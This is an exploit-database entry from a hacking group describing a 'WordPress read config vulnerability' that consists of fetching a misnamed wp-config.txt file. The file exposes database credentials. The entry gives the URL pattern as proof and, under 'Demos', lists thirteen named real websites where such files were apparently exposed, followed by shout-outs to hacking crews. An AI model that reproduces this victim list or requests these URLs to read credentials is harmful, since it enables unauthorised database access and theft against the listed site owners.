id: 19494
date: 09/29/2012
title: Wordpress (.txt) Read Config Vulnerability
author: TUNISIAN CYBER
cves: 

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm TUNISIAN CYBER member from Inj3ct0r Team           1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title:  Wordpress (.txt) Read Config Vulnerability
[+] Date: 29-09-2012
[+] Category: WebApp
[+] Google Dork: Use your M1ND --'
[+] Tested on: Windows 7 Professionnel 


####################################################################################


 #################################################################################
 |||                         ~~ Use It At Your Own Risk ~~                     |||
 |||                    It's For Educational Purpos Only                       |||
 |||                    I'm not Responsible For Any Damage                     |||
 #################################################################################

Pr00f:

127.0.0.1/wp-config.txt

#################################################################################

Demos:
http://pakde.com/wp-config.txt
http://www.stmarysbryantown.com/wp-config.txt
http://ganjalicious.com/wp-config.txt
http://publish.uwo.ca/~dbates2/wordpress/wordpress/wp-config.txt
http://you-s.net/wp-config.txt
http://mr-bg.com/wp-config.txt
http://ekineo.es/blog/wp-config.txt
http://likeguitar.ru/wp-config.txt
http://aussen-sicherheitspolitik.de/wp-config.txt
http://changeitmarketing.com/wp-config.txt
http://blog-haus.sven-und-tina.de/wp-config.txt
http://blog.santabarbarafotografia.es/wp-config.txt
http://hawky.pl/wp-config.txt

More in Google,bing,ask .... =)


+----------------------------------------------------->THNX T0<------------------------------------------------------------------+
       TN H4CK3RZ( Badi - xMax-tn - Silent_hill -                                                                                |
       pipo issam - anas laribi - xtech set) ,                                                                                   |
       r00tw0rm members and Inj3ct0r Team:                                                                                       |
       r0073r                                                                                                                    |
       Sid3^effects                                                                                                              |
       r4dc0re                                                                                                                   |
       CrosS                                                                                                                     |
       SeeMe                                                                                                                     |
       anT!-Tr0J4n                                                                                                               |
       KedAns-Dz                                                                                                                 |
       DaOne                                                                                                                     |
       Angel Injection                                                                                                           |
       NuxbieCyber                                                                                                               |
       Sammy FORGIT                                                                                                              |
       Taurus Omar                                                                                                               |
+-----------------------------------------------------><-------------------------------------------------------------------------+
./3nD



#  0day.today [2023-03-26]  #